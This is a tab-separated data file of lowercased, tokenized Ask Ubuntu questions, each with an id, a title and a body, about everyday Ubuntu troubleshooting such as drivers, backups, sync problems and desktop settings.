58035	how do i add a system preferences shortcut to desktop ?	i removed all gnome panels and have created a beautiful desktop using `` docky '' and `` slingshot '' only . it sounds stupid but i 'm a neat freak and panels in classic and unity just did n't do it for me . i do not have access to my system settings , however . is there a way i can add a real quick shortcut to the desktop so i can open it and pin to docky ?
58038	how are releases named ?	i 'm not sure if there is a particular naming convention with ubuntu . to give an example , apple uses big cats , microsoft uses numbers . `` jaunty jackalope '' and `` natty narwhal '' are creative names . i 'm wondering who chooses them ? is there a pattern or something similar ?
58041	bash script : how to get file name/path	suppose i want to associate ppt files to be opened with a bash script that converts it to pdf then opens it with the approperiate pdf editor . how do i do that ? conversion will be done with uniconv as i learnt from another question uniconv -f pdf presentation.odt i believe i have to change `` presentation.odt '' with the filename that triggered this script
58044	opening a terminal on eee pc	i have an eee pc 1005peb that i want to install ubuntu on . i 've tried hitting ctrl+alt+t on the express gate screen but nothing happens . i 've also tried to boot from a live cd on a usb , but nothing seems to work , i 've tried it on the left & the right side ports . i 'm not too experienced with linux , but i 've been using it on my hp pavilion for a couple of months . can anyone point me in the right direction ?
58045	why wo n't the terminal display new lines ?	for example , when i type following command , echo line | ( cat > /dev/null ; vi ) even wrapped in another shell , sh -c 'echo line | ( cat > /dev/null ; vi ) ' and returned from vim , now it wo n't display carriage return any more . how can i do to make it again display the new lines ? ( without exit . )
58053	my ubuntu one account is empty but i 'm still using 8.7 mb ?	my ubuntu one account is empty but the ubuntu one website says i 'm still using 8.7 megabytes . why is this ?
58056	which driver do i need to install for my gt540m if i want to use bumblebee ?	i have the choice of the nvidia 185 driver and the experimental one . my laptop is an acer aspire 5750g with intel sandybridge i5 . i just installed bumblebee.then i enabled the card , and ran `` nvidia-settings '' . a window saying : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . but it seems , nvidia-xconfig is not installed on my computer .
58059	how can i force the screen to stay at maximum brightness in a laptop running on battery ?	i have a laptop with intel integrated drivers running on battery and i would like to force the screen to remain in maximum brightness even when it 's idle , for example , when reading a document without using the keyboard or touchpad . is there a way to temporarily set the brightness to maximum even when there is no keyboard interaction for minutes/hours ?
58060	why is the font size in google-chrome smaller than firefox on the same system ?	why is the font size in google-chrome smaller than the font size in firefox when displaying exactly the same web page ( for example , wikipedia ) in the same ubuntu 11.04 system ? how can i make both use the same fonts as the ones in firefox ?
58065	usb data transfer rates lower than expected	usb `` data transfer rate '' on ubuntu 11.04 is 13mb/sec . this should be about 5x that for usb 2.0 . anyone have a clue why i am getting usb 1.0 speed out of a modern mainboard with zero usb 1.0 ports and only usb 2.0 ?
58066	what to do if my hard disk has bad sectors ?	i had a desktop sony vaio js vgc-js15g with a 320gb hard disk ... i tried to install ubuntu recently in this machine but it always stuck during the installation process.. i had open disk utility and at the overall assesment it say disk has bad sector . what should i do ? should i buy a new hard disk ?
58069	countdown applet , capable of counting down long periods of time ?	i want to add an applet to my panel , which would count down time for one event in the near future - ~12 days from today . standard timer-applet does not work - it is not possible to set timer to more than 48 hours . is there a ready applet for this ? or if there is no such applet , is it hard to write one ?
58071	how do i get my usb microphone to work with vlc ?	i am trying to get my usb microphone working with vlc . it works if i only load my microphone with vlc alsa : //hw:2,0 but for vlc v4l2 : // : v4l-vdev= '' /dev/video0 '' : v4l-adev= '' alsa : //hw:2,0 '' : v4l-norm=1 : v4l-frequency=-1 : v4l-caching=300 : v4l-chroma= '' '' : v4l-fps=-1.000000 : v4l-samplerate=44100 : v4l-channel=0 : v4l-tuner=-1 : v4l-audio=-1 : v4l-stereo : v4l-width=1600 : v4l-height=896 : v4l-brightness=-1 : v4l-colour=-1 : v4l-hue=-1 : v4l-contrast=-1 : no-v4l-mjpeg : v4l-decimation=1 : v4l-quality=100 -- sout `` # transcode { vcodec=mp1v , vb=5024 , scale=2 , acodec=mpga , ab=192 , channels=2 } : duplicate { dst=std { access=file , mux=mpeg1 , dst=/tmp/test.mpg } } '' i get no sound .
58072	ca n't find all wireless networks , just my neighbours	been playing with live discs since 10.10 but now have gone ahead and dual booted . i have a acer 5742z with a nplify 802.11b/g/n wireless connection . the install went well and drivers seem to be working . but , although wireless detects some local networks it does n't find mine . i have wpa-psk security on my modem , could this be the problem ? ? i do n't want to change my modem settings as all my other wifi devices are contected to it . so i need help in finding my home network . a step by step guide would be useful . i am using windows 7 now to write this but would love it if i could use ubuntu online . i only can when i connect an ethernet cable . thanks in advance .
58074	sudo , su problems	during the installation process i was asked to set a password . i chose a password ( a strong one ) and everything goes smoothly every time i log in . problems arise whenever i resort to `` sudo '' or `` su '' commands ... i mean , if i type `` sudo or `` su '' i 'm compelled to provide a password and whenever i type the password i choose during the installation process i get this error : authentication failure can someone help me ?
58078	can ubuntu one work with mac time machine ?	is is possible to set mac 's time machine to use ubuntu one ? there 's no info on mac help .
58080	why does turning caps lock off take such a long time to work ?	this is my biggest issue with linux and the main reason i do n't use it as my main working os . whenever i use caps lock to write something in upper case and disable it in order to keep writing the next letter after i 've disabled it is written in upper case . so , my text comes out weird , as something *l*ike this i 've tried linux mint , fedora ... and the issue keeps happening . searching google i 've found some very rare persons have the same issue , but i was unable to find any solution . is there any way to solve this or am i doomed *f*or life ? btw , whenever i ask this question someone suggest i should learn to use shift , instead of caps lock . i know , that 's the right way , but i 'm used to use caps lock and , well , it should work .
58082	what do i need to be able to `` dock/tile '' windows side by side	i installed ubuntu 11.04 ( command line system via alternate cd ) then packages i need including ubuntu-desktop -- no-install-recommends . i find that i ca n't tile windows side by side by dragging a window to the side anymore . i guess i 'm missing a package ? update : i am ubuntu classic so not using unity
58083	wrong app starts ( vlc ) instead of nautilus while opening a directory ( ubuntu one personal cloud , documents )	i start ubuntu one to check my documents in my personal cloud . then i follow tab `` cloud '' and link `` documents '' . this results in starting vlc and showing the directory content as if it were a play-list . i would expect nautulis to start ( to be able to browse through my files ) . somehow it seems to be a wrong or corrupted file association , but where to check of change this ? p.s . i'am a non-computer literate .
58084	xubuntu black screen , no login window , fresh install	i recently installed kubuntu on a very old imac ( self contained unit , no tower , g2 ? ) 800mhz . the xubuntu installation went well from the mini cd . i installed the kubuntu desktop package ( at the installer window ) . i restarted and i see a black screen with white text , asking if i want to boot off linux or the cd . it changes to white , then to black screen white text . it says something about a yaboot loader and it pauses for a few seconds then it changes to another screen that has a white screen with black text . it says something about prom_init . it changes to a blue screen that says `` kubuntu '' and has dots at the bottom . it appears to be loading until ... the screen turns black ( with a blacklight ) and flickers purple and red . the backlight turns off , and it stays there forever . i ca n't hear any disk activity . i tried pressing alt+f2 to f12 . nothing pops up . i was doing a fresh install of xubuntu . if i hold down the shift key during startup nothing changes . there is no grub menu , i booted from the cd and tried to find the recovery menu , none . no login sounds . i tried pressing `` e '' nothing changes with the startup .
58086	change super+t to open a terminal	i 'd like to change the super+t that opens the trash to open the terminal , as i see the ctrl+alt+t un-needed because i hardly use the trash as much as i use the bash
58090	what would be safe way to update server ?	i 'm running ubuntu server 10.10 on vmware workstation and i would like to update it since i see , that it offers new release 'natty ' , but i have a lot of important files there and i do n't know is it possible to run do-release-upgrade safely . what would be suggested as best practice ? upd : as i understand command sudo apt-get update & & sudo apt-get upgrade is only for current system update and all of it packages .
58092	ssh daemon readiness problem	i have an old laptop running as a server ( it runs ubuntu natty ) . when i ssh into the box , it often takes a long time to log on , if it 's been a while since last time i logged on . i suspect the reason to be that the ssh daemon is put to sleep somehow , and has to be woken before i can log on . can anyone explain why this happens ? additional info besides sshd the server runs transmission daemon and two dropbox instances . i have appended `` usedns no '' to /etc/ssh/sshd_config . the machine is running a desktop kernel , because i use it as a backup desktop machine as well . would it help to change it to a server kernel , or would that disable my desktop ? i have read that there might be issues with nvidia drivers when running a server kernel , but do n't know if this applies on natty .
58097	how can i remove the clear screen before login	on ubuntu server , how can i avoid the screen being cleared just before the login screen pops ? i 'm trying to read an error message on one of the services and i get this annoying clear screen and i can not scroll up with shift-pageup .
58098	is pad.ubuntu.com available for everyone ?	i really love the interface at http : //pad.ubuntu.com . it seems to be a great notepad when you want to do notes with other people . however , the main page says 'ubuntu developer summit ' . does it mean it 's meant to be used exclusively for uds ? if not , can i use it with my friends , would it be awkward ?
58101	how do i install drivers for an hp laserjet pro p1102w ?	i 've bought the hp laserjet pro p1102w . i want to use it with ubuntu lucid ( 10.04 ) , but it is not in the list of supported printers . how can i install this printer on lucid ?
58115	how do i install the hamster applet ?	i want to add hamster applet to my ubuntu 11.04 installation , i am not able to right click panel and add applet to it . please let me know the exact method . sorry , but i am novice to linux . mandar
58116	laptop restarts sometimes when i move the lid	i have a 2006 acer aspire 5630 running ubuntu 11.04. recently it started to have these symptoms : random restarts restarts whenever i move the lid forward or backward by one inch . restarts the most when i perform a cold power on sometimes it runs fine , when i move the lid the same way , nothing happens . a one point i had this message after a boot . what does that mean and why the lid is so sensitive ? i 'll be happy to hear what can i do .
58117	sync one from cloud to pc	i have reinstalled 11.04 and want to sync my files on ubuntu one back to my pc - how do i do this ? ? ? ? ? ? ? when i sign on to my account it does not sync automatically - if i put file on my pc ubuntu one folder it syncs them with the cloud - bit will not give me my files from the cloud . how do i sync the files from the cloud to the pc ?
58119	changing permissions on serial port	i 'm using the arduino ide in ubuntu , and am having issues with the serial port . it has worked in the past , but for reasons that may be unnecesary , i felt the need to change the ownership of some of the files from root ownership to my users ownership . this made the ide work correctly , but i lost the ability to use the correct serial port . in the dev folder , the port i need is listed as permission 166 . someone ( who is no longer in the area to help me ) swapped the permissions to 666 , which made it all work gloriously . however , it reverted back as soon as i restarted my computer , and if i now try to use the command : sudo chmod 666 ttyacm0 nothing happens . no error messages , but no permission change either . how can i change it , and how can i get it to change permanently . i apologize if this question is overly simplistic or unclear , i 'm an ubuntu noob , and i would n't begrudge feedback !
58124	update geany to use nano shortcuts	i use geany a lot for editing , but ultimately use nano far more often . while navigating nano i use ctrl+k and ctrl+u key combo all the time ( cut/paste ) . yes , i understand there is ctrl+c and ctrl+v but that will only work for text highlighted . where as the aforementioned combo in nano will cut/paste entire lines . ctrl+k in geany seems to remove the entire line , but ctrl+u changes the indentation , not pasting the lines cut . how can i change this behavior , or is there an alternative keypress to ctrl+u which does the same thing ?
58129	how can i make pysolfc stay resized ?	i 'm setting up ubuntu for my grandfather , and he really likes solitaire . i 'm using pysolfc because of its vegas-style scoring , which other linux solitaire apps do n't have . however , whenever i resize the window , and then close and start it again , it does n't keep the dimensions i previously set . is there any way to set the dimensions through a command , or by doing some fancy x stuff ?
58131	how do i keep guest additions working in virtual box after updates ?	i installed ubuntu 11.04 on virtual box . it had poor performance ( had low max resolution , cursor was choppy when going across the screen , none of the unity stuff was there ) , until i installed the virtual box guest additions . after installing the guest additions , everything worked beautifully until i an update through the update manager . everything looked like crap again ( the unity stuff is gone , and the mouse cursor lags when going across the screen , overall just does n't look nearly as nice as it did pre-update ) . i reran the guest additions installer and everything is almost back to normal ( the mouse cursor is one cm off target and there is an inch at the bottom of the screen which you ca n't use ) , but i would like to mitigate this for future updates . is there a way to mitigate this issue when installing updates ?
58132	where is the reference to the currently used icon theme stored ?	there are several related questions , but i found none that really answered this detail : where is the reference to the current icon theme stored ? since the icon theme can be changed , hence so too the path to its folder , it must be stored somewhere . i 'm making an application and i want it to draw its own icons from the icon theme currently in use . i 've seen answers showing how to retrieve the path using python and gtk , but i am using pyqt and would like to avoid importing gtk as well . is there a configuration file somewhere holding the current icon theme 's name or path ? or do you know a pyqt means to do that ?
58138	youtube playing audio many times	ubuntu 11.04 , firefox 6.0 , shockwave flash 10.3 r183 . every time i play a youtube video , it starts playing the audio many times , so that i get many overlapping copies of the same audio at the same time . they play whether or not the video is paused . this does n't happen on vimeo , nor does it happen in google chrome . any ideas ? edit : it also happens in youtube 's html5 mode .
58141	how to get window decorations to work correctly ?	i 'm currently using natty ( fully up-to-date ) and there is one small issue that i ca n't quite figure out : my computer has an ati radeon mobility hd 4xxx series card so i used the proprietary flgrx driver ( because i need the performance gain ) . this would n't be a problem except that all non-maximized windows in unity do n't update their title bars . when i hover over the window decorations , they do n't highlight like they are supposed to . nautilus ( which shows the current directory in its title bar ) only shows either a ) the name of the folder i first opened it to ; or b ) if i minimize the window and pull it back up , it will update to the folder i 'm currently in but still wo n't update on-the-fly . i 've always made due with it because it did n't bother me too much , but now the them that i 'm using has updated where the window decorators only show their function on hover , so it has become something of a usability issue . is this a known bug ? is there a solution to fix this ? any help appreciated . edit : found this bug in launchpad that seems to be what i 'm experiencing . if anyone has any news on this or a developer 's perspective would still love to hear back . edit2 : the theme i am using is ambiance evolution , however , the issue exists across all themes for me ( ambiance , radiance , elementary , ambiance evolution , etc . )
58143	how do i get a hp laserjet 5n printer working ?	how can i use an old ( but in working condition ) hp laserjet 5n printer in ubuntu os when i no longer have the software and ca n't locate a driver to download ?
58144	tar exiting with failure status due to previous errors	i am trying to backup my ubuntu workstation by the help of this guide and are running into trouble as the tar command outputs exiting with failure status due to previous errors . here 's what i ran in terminal : sudo -i cd / tar -cvpzf sysbackup-20110821.tar.gz \ -- exclude=/sysbackup-20110821.tar.gz \ -- exclude=/proc \ -- exclude=/lost+found \ -- exclude=/sys \ -- exclude=/mnt \ -- exclude=/media \ -- exclude=/dev / so from searching a bit , the error seems to be of a non-critical nature , but as i checkout the contents of the actual .tar file , my /home-folder is missing , so obviously something went clearly wrong . what should i do instead to backup my system without errors ?
58147	how do i disable the help f1 key ?	when the gnome desktop has focus , hitting f1 brings up `` ubuntu desktop guide '' . how do i disable this keyboard shortcut ? update : this problem seems to be gone in ubuntu 12.04 ( hitting f1 while the desktop has focus does nothing ) . i believe the question is specific to ubuntu 10.04 which i no longer have installed , so i can not verify the answers . i will accept whatever answer is confirmed by the community ( post a comment on the answer that works for you ) and please mention what ubuntu version you 're using .
58154	top of the window hidden beneath panel	in lucid some irritating pop up windows on chrome come up and are hidden beneath the top panel . i have to close the whole bunch of chrome windows to get rid of them . what is a better way ?
58155	update ( manage ) podcasts on iphone4	is there a way i can update ( manage ) podcasts on my iphone4 from ubuntu ? what i especially want to do is : - check if new episodes of podcasts are available - download new episodes
58157	hostapd in ubuntu	when using hostapd in ubuntu why can my wireless card change to the nl80211 driver that hostapd supports ? my wireles driver is broadcom corporation bcm43224 802.11a/b/g/n ( rev 01 ) subsystem : hewlett-packard company device 1509 kernel driver in use : brcm80211 kernel modules : brcm80211
58160	have a parameter applied to service for upstart	i want to run my webcit service with the -f option , how do i put that in the service script ( /etc/init.d/webcit ) ? the lines that look relevant are : rundir=/var/run/webcit path=/sbin : /usr/sbin : /bin : /usr/bin desc= '' citadel groupware webserver `` name=webcit daemon=/usr/sbin/ $ name daemon_args= '' '' pidfile= $ rundir/ $ name.pid scriptname=/etc/init.d/webcit sendcommand=/usr/sbin/sendcommand default=/etc/default/webcit logdir=/var/log/webcit/
58161	connect ubuntu to other pc with direct ( crossover ) cable	ubuntu 11.04 ( pc-1 ) is connected to pc-2 ( windows xp ) with lan cable ( crossover direct cable ) internet access is through usb wireless modem accessing router in separate room if i boot in windows 7 ( pc-1 has dual boot ) i have no problem to connect to pc-2 , at the same time being connected to internet , even sharing my internet connection with pc-2 . i set static ip address and subnet mask on both pcs and that 's all for bare connection . additionally i have set remote desktop sharing and internet connection sharing , which works as expected . my problem : i ca n't find a way to connect ubuntu with pc-2 ( wired lan connection ) when i was using debian ( month ago , as my first linux experiance ) i used wicd and i could connect to pc-2 , but i could not have internet connection at the same time ( either wired or wireless ) can someone enlighten a bit this network issues , as man pages or help files are n't for bare mortals like me , but perhaps for network experts , as i did not understood a word in it thanks
58162	ca n't play m4a files with banshee	i 've installed the gstreamer set of codecs , logged out , reboot , but banshee still does n't play my m4a files . specifically , i installed gstreamer extra plugins gstreamer plugins for mms , wavpack , quicktime , musepack gstreamer plugins for aac , xvid , mpeg2 , faad am i missing something else ? a step or package ? gstreamer0.10-plugins-bad is installed the movie plays fine in totem it plays just fine on totem ! could it be because of the album artwork ( which is showing as a `` movie '' and not being recognized by banshee ?
58164	how to move 'games ' to unity	i 've made a short-cut to games on the desk top but unity wo n't let in ! unity grays out whenever i drag it over unity then when i let go of the mouse button games gets kicked out onto the desktop ! is there a way to get unity to accept the games short-cut ? have fun d0m .
58168	how to exit the recovery console ?	i was having problems with ubuntu 11.04 freezing up with firefox , then it was freezing up with other applications as well . at login i tried recovery console and now i ca n't get out of it . ubuntu 11.04 is installed on my desktop which is an acer aspire am5100-e5401a with a amd phenom 64 quad core .
58172	how to revert to gnome classic desktop ?	i 'm used to gnome classic and personally do n't want to change to anything else , but it seems there is no more gnome classic in the oneiric release . after apt-get installed gnome-session and all , though there comes back the gnome classic option in the session listbox , however , after logged in , it seems not the expected one . there is no system menu in the top bar , and i could n't customize panels at all . i want to change the appearance ( theme ) , but i ca n't find appearance menu at all . and much more differences to my previous experience of gnome classic shell . there are multiple valid answers for this question spanning over several versions of ubuntu . for your convenience an index of each below : 13.04 and up 12.04 and 12.10 11.10 11.04 answer 1 & 11.04 answer 2 mate desktop fix icon spacing
58173	how do i configure my broadband connection ?	i have broadband connection , in windows it is working properly.in ubuntu 9.10 it is not working , so suggest me possible solution..
58174	change manually the icon of a nautilus place item	i 've added some of my sftp to nautilus but there is no option to change the icon of the marker , since nautilis adds directly to the places section . i searched for a gconf config but did n't found . example ( inf-ufg sftp is the folder/marker icon that i want to change ) :
58176	brightness keys wo n't work	hello i was wondering if anyone is having this same issue as i am , i am currently unable to change my brightness level on my laptop using the keyboard combinations to change the brightness level but i am able to do so with the slider with power manager settings ( while using gnome as de the brightness applet wo n't work either ) . i already change the grub kernel parameters to `` quiet acpi_osi=linux acpi_brightness=vendor splash '' and all the similar combinations that people often suggest and i had no luck ( actually those made it impossible to change the brightness even in the power manager settings ) . typing in a terminal ... pkexec /usr/sbin/gnome-power-backlight-helper -- set-brightness 1 makes my brightness to go the lowest level and ... pkexec /usr/sbin/gnome-power-backlight-helper -- set-brightness 10 the highest level . i was wondering if anyone has had this same issue . i do n't know if this helps but while using fedora this issue does not happens , brightness keys will work perfectly fine .
58179	install of mod_proxy to get proxypass to work	i 've been trying to follow these instructions , so that i could get the citadel mail server to work alongside apache , but i get an error when i try to restart apache : invalid command 'proxypass ' , ... i was told in the apache docs that this is from the mod_proxy module , but apt-get install mod_proxy gives e : could n't find package mod_proxy , and i was unable to find it on the big list on the apache site . what do i need to do to get the proxypass working in ubuntu 10.04 tls ?
58184	is there an application or a log that tracks apps/processes that were running just before an unexpected shutdown	it 's very helpful that browsers and various document readers remember their pre-crash states , but is there a way for ubuntu to do this ? if i have a bunch of apps open , is that `` app state '' stored anywhere ?
58191	how can i uninstall a locale via command-line ?	i have 5 unused locales on my system . how can i remove them via command line ? i have use localepurge but it did n't work .
58196	can i launch tomboy notes over ssh	i have a few machines running ubuntu and often i need to run an application from one machine on another . so i use ssh to do this as i already have it set up and it is simple to do . for example ssh -x netbook liferea this works well for me as i do n't have to sync files or install applications on all my machines . when i try to do this with tomboy notes i get errors : ssh -x netbook tomboy unhandled exception : system.exception : unable to open the session message bus . -- - > system.argumentnullexception : argument can not be null . parameter name : address at ndesk.dbus.bus.open ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at ndesk.dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at ndesk.dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 at ndesk.dbus.busg.init ( ) [ 0x00000 ] in < filename unknown > :0 at tomboy.gnomeapplication.initialize ( system.string locale_dir , system.string display_name , system.string process_name , system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0 at tomboy.application.initialize ( system.string locale_dir , system.string display_name , system.string process_name , system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0 at tomboy.tomboy.main ( system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0 is it possible to launch tomboy notes over ssh ?
58197	project hamster indicator : mono icons	does anybody know where to find the mono icons described here ? the download links are broken .
58202	how to automatically fetch missing dependencies when installing software from .deb ?	i 'm trying to install mysql workbench on my ubuntu box ( 11.04 ) . the website has a ubuntu .deb available for download ( for 10.10 and 10.04 so i chose 10.10 ) . however , sudo dpkg -i mysql-workbench-gpl-5.2.34-1ubu1010-amd64.deb yields : ( reading database ... 194069 files and directories currently installed . ) preparing to replace mysql-workbench-gpl 5.2.34-1ubu1010 ( using mysql-workbench-gpl-5.2.34-1ubu1010-amd64.deb ) ... unpacking replacement mysql-workbench-gpl ... dpkg : dependency problems prevent configuration of mysql-workbench-gpl : mysql-workbench-gpl depends on libctemplate0 ; however : package libctemplate0 is not installed . mysql-workbench-gpl depends on libpython2.6 ( > = 2.6 ) ; however : package libpython2.6 is not installed . mysql-workbench-gpl depends on libzip1 ( > = 0.8 ) ; however : package libzip1 is not installed . mysql-workbench-gpl depends on python-paramiko ; however : package python-paramiko is not installed . mysql-workbench-gpl depends on python-pysqlite2 ; however : package python-pysqlite2 is not installed . dpkg : error processing mysql-workbench-gpl ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for python-support ... errors were encountered while processing : mysql-workbench-gpl my question is , is there a way to tell dpkg to automatically fetch missing dependencies , or do i need to manually apt-get install missing packages like libctemplate0 and libpython2.6 ? ( or alternatively , is there some other way to get mysql workbench easily up & running ? )
58206	how to convert from from ubuntu desktop 11.04 to ubuntu server 11.04	how to convert from from ubuntu desktop 11.04 to ubuntu server 11.04 what does the below command do ? sudo apt-get install linux-headers-server linux-image-server linux-server
58208	i get a blank screen rather than a screen saver	when my screen saver is due to start i just get a blank screen . i have recently installed compiz , before the screen saver worked as normal . i do n't get locked out or any major problem but i just see a blank screen rather than one of the pre-installed screen-savers .
58212	skype crashes if run with normal user - no problem with root	running skype on amd64 : linux32 skype . if i use a normal account to connect skype , it crashes upon connecting , at the exact moment it is trying to play a sound file . my console then displays aborted . when i launch it as root user , i have no problem in connecting , and i can chat ( text ) and receive audio . tried rm ~/.skype/shared.xml on normal user to no avail . tried also chmod ugo-r libpulse-simple.so.0.0.3 as root but still crashing . thanks for your help .
58213	gnome failure after update	i originally asked this question over the ubuntu forums , but i 'm not really sure where the best place to get help is . anyway ... i 've had ubuntu 11.04 installed on my desktop since it 's release . up until an hour ago , it was working fine . i clicked on an update from the update manager , now booting into a graphical mode is completely broken , ( the start-up load hangs at 'check battery state ... [ 0k ] ' ) . i restarted my computer , and booted into safe mode , and launched the terminal . this all works fine . i then typed : sudo gdm start into the command prompt , hoping that i would be able to start things manually . instead , it spat out this : gdm-binary [ 230 ] : warning : unable to load file '/etc/gdm/custom.conf ' . no such file or directory . gdm-binary [ 230 ] : warning : unable to find users : no seat-id found . gdm-binary [ 230 ] : warning : gdm display : display lasted 0.070467 seconds the last line was printed about 8 times , with slightly different times , before it gave up and failed . some information which might help , i have gnome 2 , unity and kde ( not sure which version ) , installed . my graphics card is the gtx 275 , and i have driver the nvidia driver 275.21 . so yeah , i think the update has gone and moved custom.conf somewhere , but i have no idea on how to fix it . i have a graphics programming assignment due on friday and i would be eternally grateful if i could get this fixed well before then . thanks .
58215	gnome-system-monitor does n't start any more	recenly i noticed that system monitor ca n't start anymore , removing it with conf and installing it again did n't help , after running debug i get this : ** ( gnome-system-monitor:9233 ) : debug : [ 1,117 procman.cpp:695 main ] post gtk_init ** ( gnome-system-monitor:9233 ) : debug : [ 1,125 procman.cpp:733 main ] end init ** ( gnome-system-monitor:9233 ) : debug : [ 1,144 smooth_refresh.cpp:68 load_gconf_value ] smooth_refresh is enabled ** ( gnome-system-monitor:9233 ) : debug : [ 1,144 procman.cpp:738 main ] begin create_main_window ** ( gnome-system-monitor:9233 ) : debug : [ 1,253 util.cpp:220 load_symbols ] found libselinux.so.1 ** ( gnome-system-monitor:9233 ) : debug : [ 1,253 util.cpp:236 load_symbols ] loaded getpidcon from libselinux.so.1 ** ( gnome-system-monitor:9233 ) : debug : [ 1,253 util.cpp:236 load_symbols ] loaded freecon from libselinux.so.1 ** ( gnome-system-monitor:9233 ) : debug : [ 1,253 util.cpp:236 load_symbols ] loaded is_selinux_enabled from libselinux.so.1 ** ( gnome-system-monitor:9233 ) : warning ** : selinux was found but is not enabled . all i 've found by searching the last line in google is some old bug from 2008 .
58218	how supported is a dell 15z ?	i am looking to buy a new development machine and would like to run ubuntu natively . i have been looking at the dell 15z , but it looks like there are some compatibility problems . however , i also saw a an article that made it look like most everything was working . these may be somewhat out of date , so i was wondering if anyone had any updated information . i would hate to buy the laptop and then have it not work well with ubuntu . also , i do n't know much about how compatibility changes over time . if it is n't that compatible now , will it likely be more compatible in the future ? will developers likely resolve the compatibility issues , it is just a matter of time ? are we dependent on dell to release driver fixes for stuff ? thanks !
58220	live-usb with read-write stick	i 've got one of the few usb sticks with hardware read only switch ( trekstor ) . i 'd like to use a bootable linux with it , e.g . to fix problems with windows pcs without danger of infecting or changing the stick 's contents . however , for installing updates or new software on it in a safe environment , it should be possible to write to the stick when the switch is on write enabled . i 'm not sure how switching form one mode to the other is internally done . any experience with such a kind of drive and how to configure live-usb in this case ? if restart is required to change the writing mode , this would be ok .
58222	is gnome 3 lighter than gnome 2 ?	as we are going toward gnome 3 , i would like to know what to expect . may be a more responsive desktop , faster startup of apps ? or should i start to thinking in another de if performance is a concern ? i am wondering about a gnome-3 vs gnome-2 comparison , not gnome shell vs unity .
58226	can ubuntu act as a domain controller for multiple oses ?	i would like to install ubuntu server at my church to start testing a few options ( to eliminate microsoft usage ) . some pcs use windows xp , and some use ubuntu . i would like the ubuntu server to be a domain controller so that any user account will be able to log on to either a windows or ubuntu desktop . is this possible ? i would also like to be able to manage accounts from the server ? ( eg . adding , removing , modifying )
58227	pdf files shown on chrome have no spaces	why while viewing pdf files on ubuntu on chrome no spaces are shown ? is it my problem or it 's same for everyone ? if i open that file in firefox it asks me to download it , but i ca n't see it without downloading . edit : maybe anyone knows how to make it automatically download like in firefox ?
58232	how to assign ms windows drive letter to a formatted partition ?	i have formatted one of my partitions from ubuntu as ntfs , and now when i try to restore my windows os to that partition , the restore utility ( which resides in the first partition , fails saying that it was unable to locate `` c : '' drive . is there a way in ubuntu to assign the drive letter to a partition when i format it as ntfs ?
58238	can tomboy import notes from a directory ( eg dropbox ) ?	i am an ios user and use an app called plaintext to sync my notes with dropbox . i noticed with tomboy notes you can sync to a local directory - upon setting this to the plaintext directory in dropbox ( the area where plaintext syncs to my dropbox ) i expected to see tomboy recognize the plain text files in that directory . so my question is , are there any add-ins that will allow tomboy to watch that directory and import when plain text files are added ?
58242	after i installed wicd my wireless network interface disappeared . how do i fix it ?	i had some issues with my wireless at my school . i had tried everything almost and usually it did not want to connect , or when it connected , it disconnected again a few minutes later . someone suggested that i could install windows wireless drivers . i did that and had better luck connecting , but still disconnection issues . then someone suggested wicd . i install that and after i did that , wlan0 disappeared . i could not connect in any way with wicd and even after uninstalling it and installing network-manager again , it is still not there . ( and countless reboots ) . i have tried adding auto wlan0 inet dhcp to interfaces but nothing works . the wired connection still works fine .
58244	upgrade from 32 bit to 64 bit ?	i would like to know if it is possible to upgrade from 32 bit to 64 bit . say currently i am using 11.04 32 bit , then come october could i upgrade to 11.10 64 bit ? not a fresh install , or separate install . it is possible ? if not what would be the recommended way to go about this ? thank you for your time and answers
58248	what is the proper way to install a free/libre kernel ?	what is the proper way to install , for example , the debian squeeze libre kernel in ubuntu natty ? is it safe to do so ?
58249	do i need to reboot my computer to read data from two sd cards ?	i stuck an sd card in the card reader , imported my photos with shotwell , deleted the photos from the card ( again , with shotwell ) , then right-clicked on the desktop icon and safely removed the card . i then physically removed the card and inserted another . the computer is ignoring it . how can i tell ubuntu that there 's a new card in there now and i want to look at it ? i know that rebooting the computer will work , and i 'll do that this time , but there must be a better way for next time .
58250	what is an easy video editor ?	i just need to cut some parts from a video that is too long . what would be a good ( gui ) app to do that ? all the ones i tried ( pitivi , kino ) are way too complex for what i want to do thanks !
58256	tar : backing up an encrypted /home folder ?	after some trial and error , i 've managed to backup my ubuntu 10.04 workstation and it 's time for my laptop . it also runs 10.04 , but has an encrypted /home folder . running the below snippet as root clearly does n't work well with encryption , so how should i do this ? sudo -i cd / tar -cvpzf sysbackup-20110821.tar.gz \ -- exclude=/sysbackup-20110821.tar.gz \ -- exclude=/proc \ -- exclude=/lost+found \ -- exclude=/sys \ -- exclude=/mnt \ -- exclude=/media \ -- exclude=/dev /
58259	why is n't my computer sending input to my monitor ?	i have a desktop machine with 11.04 . it has ati/radeon graphics : john @ john : ~ $ lspci | grep vga 01:05.0 vga compatible controller : ati technologies inc rs880 [ radeon hd 4250 ] i was attempting to run some programs on wine on it . it suggested using the proprietary driver if a had problems , which i did . i opened `` additional drivers '' and there it was : the fglrx driver just waiting to be installed . i hit `` activate '' and it installed , prompting me to reboot to complete the upgrade . i closed the window , opened the shutdown menu , and hit `` reboot to complete upgrade '' . when it came back , it ran a disk check and froze on the purple screen with the word ubuntu and the 5 dots . after about 15 minutes , i rebooted it . same story . thinking it was a fluke , i rebooted once more . this time , nothing . zilch . nada . i do n't even see the bios . my monitor insists that there is no video coming from the computer . at all . i 've installed this driver before on an identical machine with no trouble at all . i 'm aware of this question , but that asker gets a black screen , i get no screen at all . i 'm fairly sure i could fix this if i could just make it to a terminal , but no amount of keypresses ( ctrl + alt + f1 , alt + f2 , holding shift during boot ) brought me anything . what can i do ?
